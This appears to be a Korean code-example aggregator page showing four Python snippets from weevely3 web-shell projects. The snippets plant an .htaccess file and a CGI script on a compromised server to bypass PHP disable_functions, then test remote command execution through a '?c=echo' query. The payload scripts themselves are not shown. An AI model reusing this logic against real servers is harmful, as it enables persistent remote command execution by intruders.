Python randstr 예제들

예제 #1

파일: disablefunctionbypass.py 프로젝트: Akramwired/Pentest_notes

    def _install(self):

        if not self.vectors.get_result('mod_cgi'):
            log.warning(messages.module_audit_disablefunctionbypass.
                        error_mod_cgi_disabled)
            return

        filename = strings.randstr(
            5, charset=string.ascii_lowercase).decode('utf-8')
        ext = strings.randstr(3,
                              charset=string.ascii_lowercase).decode('utf-8')

        result_install_htaccess = self.vectors.get_result(
            'install_htaccess', format_args={'extension': ext})
        if (not result_install_htaccess or not result_install_htaccess[0][0]
                or not result_install_htaccess[0][1]):
            log.warning(messages.module_audit_disablefunctionbypass.
                        error_installing_htaccess)
            return

        htaccess_absolute_path = result_install_htaccess[0][0]
        script_absolute_path = '%s.%s' % (htaccess_absolute_path.replace(
            '.htaccess', filename), ext)
        script_url = '%s.%s' % (result_install_htaccess[0][1].replace(
            '.htaccess', filename), ext)

        result_install_script = self.vectors.get_result(
            'install_script',
            format_args={
                'script': self.args.get('script'),
                'rpath': script_absolute_path
            })
        if not result_install_script:
            log.warning(messages.module_audit_disablefunctionbypass.
                        error_uploading_script_to_s % script_absolute_path)
            self._clean(htaccess_absolute_path, script_absolute_path)
            return

        result_chmod = self.vectors.get_result(
            'chmod', format_args={'rpath': script_absolute_path})
        if not result_chmod:
            log.warning(messages.module_audit_disablefunctionbypass.
                        error_changing_s_mode % script_absolute_path)
            self._clean(htaccess_absolute_path, script_absolute_path)
            return

        if not self._check_response(script_url):
            log.warning(messages.module_audit_disablefunctionbypass.
                        error_s_unexpected_output % (script_url))
            self._clean(htaccess_absolute_path, script_absolute_path)
            return

        log.warning(messages.module_audit_disablefunctionbypass.
                    cgi_installed_remove_s_s %
                    (htaccess_absolute_path, script_absolute_path))
        log.warning(
            messages.module_audit_disablefunctionbypass.run_s_skip_reinstalling
            % (script_url))

        return script_url

예제 #2

파일: disablefunctionbypass.py 프로젝트: Dark-Vex/weevely3

    def _install(self):
        
        if not self.vectors.get_result('mod_cgi'):
            log.warning(messages.module_audit_disablefunctionbypass.error_mod_cgi_disabled)
            return
                
        filename = strings.randstr(5, charset = string.ascii_lowercase)
        ext = strings.randstr(3, charset = string.ascii_lowercase)
        
        result_install_htaccess = self.vectors.get_result(
            'install_htaccess', 
            format_args = { 'extension': ext }
        )
        if (
            not result_install_htaccess or 
            not result_install_htaccess[0][0] or 
            not result_install_htaccess[0][1]
            ):
            log.warning(messages.module_audit_disablefunctionbypass.error_installing_htaccess)
            return
        
        htaccess_absolute_path = result_install_htaccess[0][0]
        script_absolute_path = '%s.%s' % (htaccess_absolute_path.replace('.htaccess',filename), ext)
        script_url = '%s.%s' % (
            result_install_htaccess[0][1].replace('.htaccess',filename), 
            ext
        )
        
        result_install_script = self.vectors.get_result(
            'install_script', 
            format_args = { 'script' : self.args.get('script'), 'rpath': script_absolute_path }
        )
        if not result_install_script:
            log.warning(messages.module_audit_disablefunctionbypass.error_uploading_script_to_s % script_absolute_path)
            self._clean(htaccess_absolute_path, script_absolute_path)
            return
        
        result_chmod = self.vectors.get_result(
            'chmod', 
            format_args = { 'rpath': script_absolute_path }
        )
        if not result_chmod:
            log.warning(messages.module_audit_disablefunctionbypass.error_changing_s_mode % script_absolute_path)
            self._clean(htaccess_absolute_path, script_absolute_path)
            return

        if not self._check_response(script_url):
            log.warning(messages.module_audit_disablefunctionbypass.error_s_unexpected_output % (script_url))
            self._clean(htaccess_absolute_path, script_absolute_path)
            return           

        log.warning(messages.module_audit_disablefunctionbypass.cgi_installed_remove_s_s % (htaccess_absolute_path, script_absolute_path))
        log.warning(messages.module_audit_disablefunctionbypass.run_s_skip_reinstalling % (script_url))

        return script_url

예제 #3

파일: disablefunctionbypass.py 프로젝트: Dark-Vex/weevely3

 def _check_response(self, script_url):
     
     script_query = '%s?c=' % (script_url)
     query_random_str = strings.randstr(5)
     command_query = '%secho%%20%s' % (script_query, query_random_str)
     
     result_request = http.request(command_query)
     
     return query_random_str in result_request

예제 #4

파일: disablefunctionbypass.py 프로젝트: kuteminh11/webshell-generate-weevely3

    def _check_response(self, script_url):

        script_query = '%s?c=' % (script_url)
        query_random_str = strings.randstr(5)
        command_query = '%secho%%20%s' % (script_query, query_random_str)

        result_request = http.request(command_query)

        return query_random_str in result_request